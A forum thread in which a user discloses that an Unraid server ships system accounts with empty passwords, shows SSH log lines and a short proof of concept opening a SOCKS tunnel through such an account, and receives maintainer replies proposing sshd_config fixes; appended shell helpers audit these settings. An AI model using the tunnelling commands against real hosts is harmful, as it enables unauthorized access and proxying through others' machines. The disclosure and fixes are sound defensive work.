Mihai Posted June 20, 2020

Hello guys,

I couldn't find any proper channels for announcing vulnerabilities, so I think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.

Upon looking at some logs I noticed:

```
sshd[28121]: Accepted none for lp from 194.61.26.34 port 26028 ssh2
```

Then after I took a close look at /etc/shadow I noticed almost all users don't have passwords. While they can't actually execute commands on the system, they can see information about the system:

```
$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.
$
```

But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.

```
$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0 127.0.0.1:3129          0.0.0.0:*               LISTEN      1658854/ssh
```

Voila! Then you have an ssh tunnel opened. For now I patched my box, but of course it won't survive the reboot.

An easy fix would be: `sed -i -e 's/::1/:!!:1/g' /etc/shadow`

Cheerio,
Mihai
Mihai Posted June 20, 2020

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind):

```
[root@taicasimaica ~]# curl -ks4 showip.net
124.122.71.51
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N [email protected] -p 7127
The authenticity of host '[x.ninja]:7127 ([91.82.91.172]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://127.0.0.1:3129
[root@taicasimaica ~]# curl -ks4 showip.net
91.82.91.172
[root@taicasimaica ~]#
```
BRiT Posted June 21, 2020

Did you send any PM or email to @limetech, @jonp or @eschultz first?
bonienl Posted June 21, 2020

Thanks for reporting, I have made an internal report for follow-up.
limetech Posted June 21, 2020

> 21 hours ago, Mihai said:
> An easy fix would be:

Would it be better to change this line in /etc/ssh/sshd_config:

```
PermitEmptyPasswords yes
```

to

```
PermitEmptyPasswords no
```
limetech Posted June 21, 2020

Or.. how about if we add this to sshd_config:

```
AllowTcpForwarding no
Match Group root
AllowTcpForwarding yes
```

Then only the 'root' user can set up forwarding.
Mihai Posted June 21, 2020

I would use these sshd configurations + setting the users disabled. I don't think having users with empty passwords is a good idea. Thanks for the fast reply!
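The two fixes discussed in this thread (locking empty-password accounts in /etc/shadow, and setting PermitEmptyPasswords / AllowTcpForwarding in sshd_config) can be audited with a few shell functions. The following is an added example, not code from the thread or from Unraid; it runs on constructed sample files so it works offline, and the function names and sample values are assumptions.

```shell
# Added audit helpers, not from the thread or Unraid. Each function takes a
# file path, so it runs on the constructed samples below or, as root, on the
# real /etc/shadow and /etc/ssh/sshd_config.

# Login names whose password field (2nd colon-separated field) is empty.
# These are the accounts that log "Accepted none" when sshd allows empty passwords.
empty_password_users() {
    awk -F: '$2 == "" { print $1 }' "$1"
}
# Lock every empty-password entry by writing "!" into the password field,
# which disables password login without touching the other fields.
lock_empty_password_users() {
    sed 's/^\([^:]*\)::/\1:!:/' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}
# Effective global value of an sshd_config keyword: the first occurrence wins,
# comments are skipped, and everything after a "Match" line is conditional,
# so it is ignored here.
sshd_global_option() {
    awk -v key="$2" '
        /^[[:space:]]*#/ { next }
        tolower($1) == "match" { inmatch = 1 }
        !inmatch && tolower($1) == tolower(key) && !done { print $2; done = 1 }
    ' "$1"
}

# Constructed samples mirroring the thread (not real system files; hash is fake).
SAMPLE_SHADOW=$(mktemp)
cat > "$SAMPLE_SHADOW" <<'EOF'
root:$6$saltsalt$notarealhash:18400:0:99999:7:::
lp::18400:0:99999:7:::
news::18400:0:99999:7:::
nobody:!!:18400:0:99999:7:::
EOF
SAMPLE_SSHD=$(mktemp)           # weak settings, as found on the box in the thread
cat > "$SAMPLE_SSHD" <<'EOF'
PermitEmptyPasswords yes
AllowTcpForwarding yes
EOF
SAMPLE_SSHD_FIXED=$(mktemp)     # hardened settings proposed in the thread
cat > "$SAMPLE_SSHD_FIXED" <<'EOF'
PermitEmptyPasswords no
AllowTcpForwarding no
Match Group root
    AllowTcpForwarding yes
EOF

echo "empty-password accounts: $(empty_password_users "$SAMPLE_SHADOW" | tr '\n' ' ')"
echo "PermitEmptyPasswords (weak config): $(sshd_global_option "$SAMPLE_SSHD" PermitEmptyPasswords)"
echo "AllowTcpForwarding (fixed config, global): $(sshd_global_option "$SAMPLE_SSHD_FIXED" AllowTcpForwarding)"
```

Run against a real box as root by passing /etc/shadow and /etc/ssh/sshd_config instead of the sample paths; the lock function rewrites the file it is given, so back up /etc/shadow first.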